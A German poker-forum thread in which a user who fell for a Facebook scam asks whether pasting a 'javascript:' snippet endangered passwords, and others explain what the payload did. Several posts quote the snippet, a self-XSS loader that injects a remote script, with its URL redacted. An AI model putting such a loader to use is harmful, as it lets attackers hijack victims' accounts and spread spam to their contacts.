Zum Forum springen
Code in browser ein...
 
Benachrichtigungen
Alles löschen

[Geschlossen] Code in browser eingegeben - gefahr?

7 Beiträge
4 Benutzer
0 Reactions
424 Ansichten
lolyourmama
Beigetreten: 11.07.2009
PokerStrategist

hi,

erstmal facepalm an mich selbst: :facepalm:

bin heut auf son neuen fatzebook scam reingefallen und hab diesen code in den browser eingegeben ( LOL WTF???)

javascript: (a = (d = document).createElement("script")).src = "editiert"; void(d.body.appendChild(a))

kann mir irgendwas passieren in bezug auf pokers, pws etc? hat sich danach nix geändert, hab noscirpt auch grad aus gehabt :facepalm:


6 Antworten
Kilania
Beigetreten: 23.04.2007
Oldschool Grinder

Original von lolyourmama
hi,

erstmal facepalm an mich selbst: :facepalm:

bin heut auf son neuen fatzebook scam reingefallen und hab diesen code in den browser eingegeben ( LOL WTF???)

javascript: (a = (d = document).createElement("script")).src = "editiert"; void(d.body.appendChild(a))

kann mir irgendwas passieren in bezug auf pokers, pws etc? hat sich danach nix geändert, hab noscirpt auch grad aus gehabt :facepalm:

Ziemlicht leichtsinnig - brauche ich wohl kaum erklären Den Link entfernte ich, da er die Unschuldigen hier nur unnötig gefährdert.

So Stalker Mist gibts tonnenweise und in meinem RSS Feed blinkten drüber auch schon drüber öfters News auf, welche dieses Stalker App behandeln.
Richtig bösen Code schleusen nur die wenigsten FB Apps ein, viele spähen halt irgendwie deine persönlichen Infos aus, welche du dir dann online kaufen kannst..

Da es viele so Tools gibt, da einfach viele User drauf anspringen, solltest du evt. mal nach dem Link googlen, obs drüber Warnungen oder so gibt

was klar ist: Ganz ohne Konsequenzen bleibts wohl niemals


lolyourmama Themenstarter
lolyourmama
Beigetreten: 11.07.2009
PokerStrategist

Original von Kilania

Original von lolyourmama
hi,

erstmal facepalm an mich selbst: :facepalm:

bin heut auf son neuen fatzebook scam reingefallen und hab diesen code in den browser eingegeben ( LOL WTF???)

javascript: (a = (d = document).createElement("script")).src = "editiert"; void(d.body.appendChild(a))

kann mir irgendwas passieren in bezug auf pokers, pws etc? hat sich danach nix geändert, hab noscirpt auch grad aus gehabt :facepalm:

Ziemlicht leichtsinnig - brauche ich wohl kaum erklären Den Link entfernte ich, da er die Unschuldigen hier nur unnötig gefährdert.

So Stalker Mist gibts tonnenweise und in meinem RSS Feed blinkten drüber auch schon drüber öfters News auf, welche dieses Stalker App behandeln.
Richtig bösen Code schleusen nur die wenigsten FB Apps ein, viele spähen halt irgendwie deine persönlichen Infos aus, welche du dir dann online kaufen kannst..

Da es viele so Tools gibt, da einfach viele User drauf anspringen, solltest du evt. mal nach dem Link googlen, obs drüber Warnungen oder so gibt

was klar ist: Ganz ohne Konsequenzen bleibts wohl niemals

dass sie meine fatzebook-daten abgegriffen haben ist mir klar - aber auch ziemlich egal, da keine persönlichen infos o.ä.

das einzige was ich bis jetzt dazu gefunden habe ist das:

http://jsunpack.jeek.org/dec/go?report=0c24f8f0411d34da1f39227c1d1c5d779e4e33c2

sagt mir nur leider garnichts

ich frag mich nur ob ich jetzt alles neu aufsetzen muss (würde ca 1000 jahre dauern mit all den progs usw usw :( )

hab jede menge $$$ online, ist aber hinter RSA und sollte damit sicher sein

trotzdem kein bock, dass jetzt jmd mein keepass pw oder so mitloggt


crt32
Beigetreten: 17.02.2007
Elite Grinder

hier gibts das ganz noch ein bisschen lesbarer: http://pastebin.com/tyM13B8v
scheint ja eine ganz lustige sache zu sein


acegipoker
Beigetreten: 09.04.2009
PokerStrategist

Naja, JavaScript kann auf deinen Arbeitsspeicher und deine Festplatte laut Spezifikation nicht zugreifen. Somit haben sie wohl KeePass nicht auslesen können.
Musst dir imo nur sorgen über deinen Facebook Account machen und über andere Seiten, die du offen hattest.


crt32
Beigetreten: 17.02.2007
Elite Grinder

Hab das ganze mal lesbarer gemacht: http://pastebin.com/2mR8XJpC

so weit ich das sehe passiert folgendes:
- das ganze verbreitet sich selbst weiter, indem nachrichten an alle deine freunde geschickt werden
- deine privatsphäre einstellungen werden auf ganz niedrig gesetzt
- irgendwelche e-mail adressen werden zu allen deinen pages als admins hinzugefügt
- du wirst fan von diesen seiten, die es aber nicht mehr gibt:

- du lädst alle deine freunde zu einer veranstaltung ein, die es aber auch nicht mehr gibt


Kilania
Beigetreten: 23.04.2007
Oldschool Grinder

Original von acegipoker
Naja, JavaScript kann auf deinen Arbeitsspeicher und deine Festplatte laut Spezifikation nicht zugreifen. Somit haben sie wohl KeePass nicht auslesen können.
Musst dir imo nur sorgen über deinen Facebook Account machen und über andere Seiten, die du offen hattest.

Gab aber schon hin und wieder Exploits, welche es dazu brachten via FB Anwendungen Code auf dem Recher auszuführen.
Allerdings sagte ich ja schon, dass dieser FAll selten vorkommt

Meistens sinds eher so unterhaltsame Dinge, wie crt bereits erklärte..


Teilen: